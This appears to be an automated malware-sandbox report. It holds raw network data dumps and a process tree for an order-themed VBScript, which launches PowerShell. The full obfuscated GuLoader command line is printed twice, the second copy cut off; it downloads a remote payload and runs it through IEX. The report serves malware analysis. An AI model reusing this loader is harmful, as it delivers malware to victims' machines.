                                                  2024-10-21 15:05:53 UTC8000INData Raw: 9b d9 6f 5e 80 60 5c cd 65 ca 3c c1 c8 4d 1d cf ac 2f ee 6d bc 27 62 b4 87 24 ab e6 41 96 0d 35 6d 9a 0d 9c 40 fa 4a f4 80 9c ca 6f 05 e8 0b 3d 4f b5 65 34 fd 78 11 8c 84 3a a3 18 df 5b e9 b9 ef ed 8b 06 71 34 88 30 62 ec 50 c3 3a 46 6f 30 4b f2 54 14 09 55 82 5b 23 d8 8b e8 ea 32 62 3e c3 83 a7 a6 99 94 ca 82 3b 5d b0 d5 2b 5a c7 c0 bb 63 20 ab 91 c5 f8 a3 fe ab b1 e6 68 d0 34 31 bd e1 25 75 b4 28 96 c2 3c 22 17 51 a5 17 b1 45 95 d2 5c 6a 64 a0 83 c2 95 c0 b8 6d a8 1e 2b 47 1b 80 f4 29 89 ff 18 db 6f e6 19 4f c2 db 7f 1f f7 0d ff 87 11 b3 34 ad 83 f1 0e 2a 9c 7e 13 8c d2 08 8f fb 76 f1 20 e6 59 40 17 8a 0e f6 f2 ed c5 ed 4f 9e e2 a6 d9 8f 63 93 fd ed fa 24 d0 48 3f d8 1a b3 e7 4f 43 8f 54 5b 12 47 8f 29 06 b7 6e 1f a8 8c 57 c0 c7 9a a8 11 22 d9 84 c6 70
                                                  Data Ascii: o^`\e<M/m'b$A5m@Jo=Oe4x:[q40bP:Fo0KTU[#2b>;]+Zc h41%u(<"QE\jdm+G)oO4*~v Y@Oc$H?OCT[G)nW"p
                                                  2024-10-21 15:05:53 UTC8000INData Raw: 27 a8 f2 05 30 c6 30 a8 82 5a 28 d3 c6 3e a4 c3 a7 b8 d6 9b 8e 34 b5 e9 8f 05 e5 0e 7e 3b 8a 89 b7 4a 79 b1 2a 19 0b 5f 74 d8 7e 9e 38 28 5d 58 9a 1b 7d 6c 44 f5 ff 9a 54 79 72 a2 8e 11 3e 69 f9 c6 30 8a e2 bd d7 b1 09 f9 d7 60 a0 d7 04 c2 f7 72 8f 0d 49 ad 01 ba e7 f1 e6 b2 19 bc b1 1b 4d 5d c9 b0 3d 33 b2 fc 39 d4 1e bc c3 eb e6 a9 3e 32 ea fe d7 d0 b3 0b f4 48 9f 1d 58 ae 5a ef a0 e2 d8 89 0d fe bc 8d c1 22 fe 4d 99 fa ba 22 ad 59 01 91 c0 69 26 30 8c af d3 28 90 a3 29 bf 9a f2 61 78 d1 29 15 3d b1 7b 12 92 5d bf 22 73 5a c8 94 b9 15 ae b1 66 96 09 00 1f 83 01 9e 43 67 8f 4a 5d 49 d3 72 89 3c 7f a9 b1 15 ac d3 09 c7 e0 b4 90 95 75 9e 87 81 b7 ab 90 71 79 90 6a 87 ab 63 f2 c5 0c cf e3 8e da 36 a6 a1 f0 88 5e 04 8d 22 29 c4 c8 04 01 02 7c fe 7b b8 f4 f8
                                                  Data Ascii: '00Z(>4~;Jy*_t~8(]X}lDTyr>i0`rIM]=39>2HXZ"M"Yi&0()ax)={]"sZfCgJ]Ir<uqyjc6^")|{
                                                  2024-10-21 15:05:53 UTC8000INData Raw: a6 d4 20 cd 52 a3 1c a3 48 df d4 75 7f b5 f3 d1 90 eb b9 8f 05 15 0e 23 1a 8a 89 50 07 38 1c a5 df 79 ed 1f dc ae 14 f4 a5 95 1d 1a 78 52 83 b9 4f 8d 28 9b 61 c1 c3 67 47 d5 5d 81 d0 bd 2f 4f 54 46 18 75 f8 a5 59 78 bc c9 ab 7c 82 cc d3 a2 a6 e9 67 fc ae e6 e2 c9 43 4e 73 24 c9 7d 5d fe 7f c4 cc 2e 5b c0 bb 59 20 ab f4 83 26 d1 4c e4 b5 64 eb 1c 5c 70 69 6f cd 9d 26 01 96 6d 2b db d1 c2 e0 94 fe 85 2e 67 eb bc a2 89 36 f1 04 3f 12 65 ba 62 b2 72 8f 93 47 a0 70 72 55 bf 27 c3 86 b0 b0 f4 9f 11 2c a2 7a c9 f1 6d b2 27 14 02 78 3f 32 69 45 2f 40 4d d9 f3 f1 d2 f4 b6 d5 0d f7 e2 3f f7 d9 aa 95 05 f3 05 d9 a7 5a 4b 99 9b f4 e8 88 96 20 11 eb 1d f2 46 e1 27 7b ba fa c7 81 c1 f7 57 3d 44 b3 b2 91 71 19 20 c8 93 47 d9 be bd ea da 16 33 8b 5f 74 d9 47 04 74 a6 b4
                                                  Data Ascii: RHu#P8yxRO(agG]/OTFuYx|gCNs$}].[Y &Ld\pio&m+.g6?ebrGprU',zm'x?2iE/@M?ZK F'{W=Dq G3_tGt
                                                  2024-10-21 15:05:53 UTC8000INData Raw: f3 e3 3b 91 81 79 58 fb b6 87 41 3c 73 e9 02 48 be 29 ba aa 02 89 22 1a 0b e1 6a db c3 12 f6 22 0f 6b 68 6f d0 fd 3e e6 72 7b 32 87 e8 d6 20 76 00 6f 5e 47 23 b5 f3 81 bb ad 87 42 a1 4e 75 57 a3 d9 5c 3a 80 c2 7c f6 54 40 09 e3 1f 02 5a d0 f1 b1 45 95 c5 38 a9 55 61 d1 7b 6a 60 da da 0a a8 43 b1 2a 8f 69 3e 83 24 fe d7 e4 b6 b0 5b 5c c1 a2 db da 62 e0 47 21 6e 93 ce 95 34 d2 6b 8a 25 2a 5e 27 49 07 e4 1a ff 6e 4b 22 0e e8 eb 38 98 18 29 b6 d2 e3 37 55 52 47 5a 9d 3d 71 95 53 a9 b7 ae 8d 35 7a 2f df fa 9f 02 78 e2 30 b2 78 00 1a e0 41 6a 30 dd f4 75 a0 38 7a 2e 26 d9 1a 1c ee fa 03 d0 6c ea 7e 67 87 08 cf ea 88 39 bd 5a 4b c6 a2 cb ad 6b 3f 37 d3 02 f3 bb df 27 8e 9f f7 b2 94 76 e5 df 1c 86 e6 59 22 25 f5 39 8f f8 c7 f6 d9 49 a2 8c 74 09 d7 8f 8a d8 86 92
                                                  Data Ascii: ;yXA<sH)"j"kho>r{2 vo^G#BNuW\:|T@ZE8Ua{j`C*i>$[\bG!n4k%*^'InK"8)7URGZ=qS5z/x0xAj0u8z.&l~g9ZKk?7'vY"%9It
                                                  2024-10-21 15:05:53 UTC8000INData Raw: ec b0 07 4a 0c ad 3c 53 84 44 48 b8 b3 82 01 38 9e 35 33 3e 0b 05 10 0b 5f 74 d8 68 c8 c7 d7 80 ea 5f e0 1e c1 b9 ca c0 11 5c 04 ba 07 ed 88 06 71 8c 82 30 62 5c 4a 91 d9 62 6a 6e 14 39 01 2c b0 ce c5 4c 8c 0e 1f 16 b3 e1 2b 43 a6 26 f9 19 0f be b8 30 68 93 9b 6e cc 2e 80 7e ce 71 de 43 54 23 2e 5c 51 79 d0 b3 0b f4 5b 74 1d 58 a6 75 a1 73 24 d5 84 26 04 52 a5 94 f8 38 1f fa 83 66 10 ba 53 4d 79 28 9e b1 bb 62 97 98 5d a6 30 e7 70 f7 95 a3 8c a3 85 58 b6 7e 2b a9 6e d7 72 ca b7 63 c9 0f 95 6f 0a 22 8c 7e 04 dc 2d f7 54 3b e1 35 3c e2 2b f2 7c a5 5d af 79 08 c8 c6 a9 0b 0d 25 b6 7f 39 95 49 98 3a b9 d8 f0 92 71 0d 2e d1 21 05 df 31 92 dc c9 c2 42 2a 0b 2a a5 5f 58 97 6d 79 22 d7 4e 35 fb d2 39 65 05 18 97 f1 2a 74 7e 4b 82 57 cf 27 85 ad 85 e4 7d ba fd f1
                                                  Data Ascii: J<SDH853>_th_\q0b\Jbjn9,L+C&0hn.~qCT#.\Qy[tXus$&R8fSMy(b]0pX~+nrco"~-T;5<+|]y%9I:q.!1B**_Xmy"N59e*t~KW'}
                                                  2024-10-21 15:05:53 UTC8000INData Raw: 04 d7 1f f1 89 b9 be 2a ad f9 7d 9e 42 70 0b 0b 05 3c 96 9f d1 d4 49 ea 34 c0 53 ea b5 6f 0e 40 99 c4 ce 35 bf 75 07 10 99 ca 1b 7d 71 e0 09 9d 90 37 92 bd 03 41 24 9f f1 44 75 7b 93 f6 62 0c c2 48 9c ac b1 f8 85 ab 93 81 42 f0 17 be 8c 38 6c 33 39 33 27 4f 8c 4b 3d 12 a1 13 c2 78 b4 70 49 5f fe ba 45 d7 ef bc 65 21 9d 59 f2 90 c2 2b 9b f6 bc 26 78 55 23 58 67 0b ba 1e c8 93 e4 79 08 d4 19 bb 62 b2 77 c5 93 47 29 be 8d 20 db d7 c6 a5 4f c2 4e f6 0c 20 3e 86 f2 0e 1f f0 6d 5d 88 c1 6f ef 50 0e 00 37 55 1b 7a 31 8b fb 44 3c 1a f7 62 02 07 b6 c9 9d 04 88 8a 8b b2 0c a3 7e 7f ba 15 2e 30 bb d8 31 4c f6 46 08 d4 bc 20 43 2f 80 b9 70 55 05 ba cb 2f e6 01 91 e1 56 8b c6 1a ca 04 82 05 c8 61 f8 94 f1 62 45 8f af fe b4 7a 10 6f fd 34 32 5b 61 06 4a b0 f7 fb 3e 7a
                                                  Data Ascii: *}Bp<I4So@5u}q7A$Du{bHB8l393'OK=xpI_Ee!Y+&xU#XgybwG) ON >m]oP7Uz1D<b~.01LF C/pU/VabEzo42[aJ>z
                                                  2024-10-21 15:05:53 UTC8000INData Raw: 6c 21 0d b9 0f 99 7a 8e 1f a2 a3 71 35 a2 3a 17 f1 3f db 1c 38 df 42 8a f6 82 97 fd 6b 14 e0 a8 86 73 0e 66 47 56 12 ed a4 14 1d 67 39 21 be 0e d4 28 14 b4 df a0 19 9b f6 c8 ef d0 6b 21 02 b6 a0 0e 4e 45 89 c7 b4 65 11 f4 9c 5f 27 bc fa ad 5a d7 47 b9 a6 df 32 ed d7 23 11 54 59 c5 13 6f 56 a2 24 2e 51 b9 94 77 15 19 c0 45 31 74 b5 c4 9d 47 a1 12 03 61 10 31 fa 28 79 cc fd 19 bb 16 83 43 78 55 67 ae 71 36 71 f7 84 c6 4b fc 19 a1 68 1d e0 c2 59 3a a1 fb 4b 4f f1 15 62 6a 64 96 bb c6 59 44 fd 66 ba dc 8f e5 c8 84 b3 46 26 19 90 c5 6a fa 75 c4 c5 b2 d7 0f 4b 3a e8 98 33 4d 28 4e 87 64 2a b9 1e 16 1a 5b 7c b2 4e c9 cb 8e e6 eb 0b 91 78 fe e5 79 1a 86 e6 39 42 05 c3 45 b5 74 02 9e d5 81 39 28 8b 75 9a bd e1 ba 02 e6 fd 33 55 87 e5 57 35 83 3e 7a 81 0a 4f ce 7b
                                                  Data Ascii: l!zq5:?8BksfGVg9!(k!NEe_'ZG2#TYoV$.QwE1tGa1(yCxUgq6qKhY:KObjdYDfF&juK:3M(Nd*[|Nxy9BEt9(u3UW5>zO{
                                                  2024-10-21 15:05:53 UTC8000INData Raw: 8b 89 8d 20 f5 c7 21 1a 79 07 24 a2 f3 9f bd e8 a5 1d 20 91 72 91 0d dd 45 65 e9 c1 ac a8 66 cc 98 71 16 7f ce 9d 3f 37 19 59 3c fd d6 eb e4 3c f4 3f 83 7d 29 4e 1c 1d 16 15 0e a6 5d 09 ce 13 26 74 2e 73 7d 5b b4 db a1 c9 2f f4 23 93 d4 7f b9 79 d6 ad 98 15 ac 9d 8b e0 4f b7 9e 6f ea c1 75 03 05 97 c2 59 9b 99 dd 28 4c 88 8a 58 fa df ae ef 45 8d 84 51 b4 71 8e c4 9d c7 67 22 d5 f0 c8 71 1a 55 d7 87 ae 4d 35 e5 4c 84 be 94 29 67 c6 62 a5 37 94 9c 01 d4 07 64 96 40 8b 2d 1d 25 e6 74 dd fb 45 be f2 a1 9d 17 09 60 a8 95 53 03 95 e5 35 1f 4b 90 0b b0 84 32 69 60 76 9b 4a b4 46 6a 80 ab c3 46 39 f3 cf 5f 42 de a8 e3 5a f9 58 9e e0 9e 4e fb e6 35 fb 09 fb 18 e6 ce d2 7c 24 62 06 74 09 0c bd 77 1d 6e 28 b9 92 85 8f 9f 80 47 3d 3e 8a fb c6 5d 4b 8d f5 a7 e0 0c 61
                                                  Data Ascii: !y$ rEefq?7Y<<?})N]&t.s}[/#yOouY(LXEQqg"qUM5L)gb7d@-%tE`S5K2i`vJFjF9_BZXN5|$btwn(G=>]Ka


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:11:05:17
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs"
                                                  Imagebase:0x7ff7c2d00000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:11:05:20
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping gormezl_6777.6777.6777.677e
                                                  Imagebase:0x7ff6771b0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:11:05:20
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:11:05:21
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
                                                  Imagebase:0x7ff6cb6b0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1668201842.00000196A8183000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:11:05:21
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:11:05:30
                                                  Start date:21/10/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending 